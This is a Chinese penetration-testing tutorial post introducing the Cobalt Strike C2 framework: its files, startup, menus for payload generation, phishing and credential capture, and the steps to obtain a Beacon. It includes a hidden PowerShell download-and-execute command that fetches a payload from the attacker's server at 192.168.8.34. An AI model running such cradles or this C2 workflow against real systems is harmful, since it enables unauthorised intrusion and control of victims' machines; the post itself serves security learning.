【渗透测试笔记】之【内网渗透——初探Cobalt Strike】

本文介绍了CobaltStrike的主要文件及其功能,如teamserver、cobaltstrike.jar等,并详细阐述了CobaltStrike的启动步骤、面板和菜单功能,包括如何新建连接、设置偏好、创建监听器等。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

拓扑图

在这里插入图片描述

CS文件说明

在这里插入图片描述

文件名解释
agscript展应用的脚本。
c2lint用于检查profile 的错误和异常。
teamserver团队服务器程序。
cobaltstrike 和 cobaltstrike.jar客户端程序。因为teamserver文件是通过Java来调用CobaltStrike 的,所以直接在命令行环境中输入第一个文件的内容也能启动Cobalt Strike 客户端 (主要是为了方便操作)。
logs日志,包括 Web日志、Beacon日志、截图日志、下载日志、键盘记录日志等。
datas用于保存当前TeamServer的一些数据。
update 和 update.jar用于更新Cobalt Strike。

1.启动方式

  1. 准备Java环境
    在这里插入图片描述
  2. 启动服务器端,并设置服务器IP和密码
    在这里插入图片描述
  3. 启动客户端
    在这里插入图片描述
  • 填写团队服务器的IP地址、端口号、用户名、密码。用户名任意,但要保证其没有被用来登录Cobalt Strike服务器。(首次连接会进行指纹检验)
    在这里插入图片描述

2.面板介绍

在这里插入图片描述

3.菜单说明

  1. Cobalt Strike 模块
    在这里插入图片描述
  • New Connection:打开一个新的”Connect”窗口。在当前窗口中新建一个连接,即可同时连接不同的团队服务器( 便于团队之间的协作)。
  • Preferences:偏好设置,首选项,用于设置Cobalt Strike主界面、控制台、TeamServer 连接记录、报告的样式。
  • Visualization:将主机以不同的权限展示出来(主要以输出结果的形式展示)。
  • VPN Interfaces:设置VPN接口。
  • Listeners:创建监听器。
  • Script Manager:查看和加载CNA脚本。
  • Close:关闭当前与TeamServer的连接。
  1. View 模块
    在这里插入图片描述
  • Applications:显示被控机器的应用信息。
  • Credentials:通过HashDump或mimikatz获取的密码或者散列值都储存在这里。
  • Downloads:从被控机器中下载的文件。
  • Event Log:主机上线记录,以及与团队协作相关的聊天记录和操作记录。
  • Keystrokes:键盘记录。
  • Proxy Pivots:代理模块。
  • Screenshots:屏幕截图模块。
  • Script Console:控制台,在这里可以加载各种脚本。(链接)
  • Targets:显示目标。
  • Web Log:Web 访问日志。
  1. Attacks 模块
    在这里插入图片描述
  • Packages
    在这里插入图片描述

    • HTML Application:基于HTML应用的Payload模块,通过HTML调用其他语言的应用组件进行攻击测试,提供了可执行文件、PowerShell、 VBA三种方法。
    • MS Office Macro:生成基于Office病毒的Payload 模块。
    • Payload Generator:Payload 生成器,可以生成基于C、C#、COM Scriptlet、 Java、 Perl、 PowerShell、Python、 Ruby、 VBA等的Payload。
    • USB/CD AutoPlay:用于生成利用自动播放功能运行的后门文件。
    • Windows Dropper:捆绑器,能够对文档进行捆绑并执行Payload。
    • Windows Executable:可以生成32位或64位的EXE和基于服务的EXE、DLL等后门程序。在32位的Windows操作系统中无法执行64位的Payload,而且对于后渗透测试的相关模块,使用32位和64位的Payload会产生不同的影响,因此在使用时应谨慎选择。
    • Windows Executable (S):用于生成一个Windows 可执行文件,其中包含Beacon的完整Payload,不需要阶段性的请求。与Windows Executable模块相比,该模块额外提供了代理设置,以便在较为苛刻的环境中进行渗透测试。该模块还支持PowerShell脚本,可用于将Stageless Payload注入内存。
  • Web Drive-by
    在这里插入图片描述

    • Manage:管理器,用于对TeamServer上已经开启的Web服务进行管理,包括 Listener 及 Web Delivery模块。
    • Clone Site:用于克隆指定网站的样式。
    • Host File:用于将指定文件加载到Web目录中,支持修改Mime Type。
    • Script Web Delivery:基于Web的攻击测试脚本,自动生成可执行的Payload。
    • Signed Applet Attack:使用Java自签名的程序进行钓鱼攻击测试。如果用户有Applet 运行权限,就会执行其中的恶意代码。
    • Smart Applet Attack:自动检测Java的版本并进行跨平台和跨浏览器的攻击测试。该模块使用嵌入式漏洞来禁用Java的安全沙盒。可利用此漏洞的Java版本为1.6.0_45以下及1.7.0 _21以下。
    • System Profiler:客户端检测工具,可以用来获取一些系统信息,例如系统版本、浏览器版本、Flash版本等。
  • spear phish 模块
    鱼叉式网络钓鱼

  1. Reporting 模块
    在这里插入图片描述
  • 0.activity report:活动报告生成。
  • 1.Hosts report:主机报告。
  • 2.Indicators of Compromise:目标报告。
  • 3.Sessions report:会话报告。
  • 4.Social engineering report:社会工程学报告。
  • 5.Tactics,Techniques,and Procedures:战术技术和步骤
  • Reset Data:重置数据。
  • Export data:数据出口。

4.获取一个Beacon

  1. 打开listener
    在这里插入图片描述
  2. 新建监听器
    在这里插入图片描述
    在这里插入图片描述
  3. 创建payload
    在这里插入图片描述
    在这里插入图片描述
    复制payload到目标执行:powershell.exe -nop -w hidden -c "IEX ((new-object net.webclient).downloadstring('http://192.168.8.34:80/a'))"
    在这里插入图片描述
    在这里插入图片描述
    目标主机成功上线,并可以看到靶机的外网IP地址,内网IP地址、监听器、用户名、机器名、是否有特权、Beacon进程的PID、心跳时间等信息:
    在这里插入图片描述

4. 执行shell命令

  1. 右键interact
    在这里插入图片描述
  2. 在beacon>输入shell whoami执行whoami命令(默认回连时间是1min)
    在这里插入图片描述

参考

https://mp.weixin.qq.com/s/dXR0ab4ymJCkArWlIoNG7w

评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值